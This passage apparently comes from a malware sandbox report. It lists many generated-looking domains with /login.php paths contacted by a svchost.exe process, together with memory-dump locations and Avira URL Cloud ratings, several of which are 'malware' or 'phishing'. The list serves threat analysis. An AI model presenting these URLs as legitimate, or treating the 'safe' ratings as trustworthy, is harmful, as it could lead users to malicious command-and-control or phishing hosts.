                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://purymuq.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998878428.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006946749.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vopycom.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1964244036.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352846166.000000000B534000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264867591.000000000B536000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796798404.00000000029CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281905134.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1797402976.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793360892.000000000B449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gatyviw.com/login.phpsvchost.exe, 00000002.00000003.2040163445.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2029740954.000000000B4C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vofybic.com/login.phpsvchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2055822668.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vojyzyt.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2391866145.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gadycew.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qegyryq.com/login.phpsvchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2532272707.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502894281.000000000B5A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vocyjet.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyryxen.com/login.phpsvchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2043884959.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053087644.00000000029CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lykyfud.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qegyvuq.com/login.phpsvchost.exe, 00000002.00000003.2071373291.000000000B404000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vojyjyc.com/login.phpsvchost.exe, 00000002.00000003.2040163445.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425676866.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2029740954.000000000B4C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423195846.000000000B536000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://galyvuz.com/login.phpsvchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vowyrif.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://pumyjig.com/login.phpsvchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qekyvup.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lygyxun.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vopyret.com/login.phpsvchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyvywed.com/http://gadyveb.com/http://lygyfex.com/http://gadyveb.com/svchost.exe, 00000002.00000003.2264854529.00000000046FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vofypuk.com/psvchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gadykos.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gahydos.com/Hsvchost.exe, 00000002.00000003.2125900220.000000000B41B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyvymej.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qebyqeq.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064178580.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071756308.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vojygok.com/login.phpsvchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053649667.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2043884959.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2069506631.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053087644.00000000029CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://galydyw.com/login.phpsvchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2448296733.000000000B4EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2096603295.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460730847.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085027687.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyryjir.com/login.phpsvchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1993850532.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1995203314.000000000B523000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lymyner.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2020836236.0000000006675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2404292160.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998698714.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023012112.000000000667A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gacyhez.com/login.phpsvchost.exe, 00000002.00000003.2059929995.00000000066BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2096603295.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085027687.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lygyfex.com/http://lyvywed.com/http://lygyfex.com/Hsvchost.exe, 00000002.00000003.2264854529.00000000046FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gadypuw.com/http://gadypuw.com/http://lymyjon.com/svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://pujyteq.com/login.phpsvchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2404292160.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547005817.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560027172.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473745496.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492823798.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003764256.000000000B4FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2007310582.000000000B4FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528215560.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536096244.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2393294547.000000000B404000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vojyduf.com/login.phpsvchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2069506631.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://ganydeh.com/login.phpsvchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2532272707.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104551479.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502894281.000000000B5A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lysytoj.com/login.phpsvchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080107692.000000000B53C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078386316.000000000B53C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gatykyh.com/login.phpsvchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2473585967.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2474118106.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
